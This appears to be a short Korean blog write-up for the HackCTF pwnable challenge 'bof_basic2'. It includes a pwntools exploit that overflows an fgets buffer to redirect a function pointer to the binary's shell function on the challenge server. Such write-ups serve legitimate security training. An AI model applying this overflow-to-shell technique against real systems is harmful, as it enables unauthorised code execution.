v5에는 sup이라는 함수가 들어있는거 같고
fgets 에서 오버플로우로 shell 함수로 덮을 수 있다
from pwn import *
r = remote('ctf.j0n9hyun.xyz', 3001)
e = ELF('./bof_basic2')
payload = 'A'*(128)
payload += p32(e.sym['shell'])
r.sendline(payload)
r.interactive()
'HackCTF > pwnable' 카테고리의 다른 글
HackCTF - x64 Simple_size_BOF (0) | 2021.11.21 |
---|---|
HackCTF - x64 Buffer Overflow (0) | 2021.11.21 |
HackCTF - 내 버퍼가 흘러넘친다!!! (0) | 2021.11.20 |
HackCTF - Basic_FSB (0) | 2021.11.20 |
Hackctf - Basic_BOF #1 (0) | 2021.11.20 |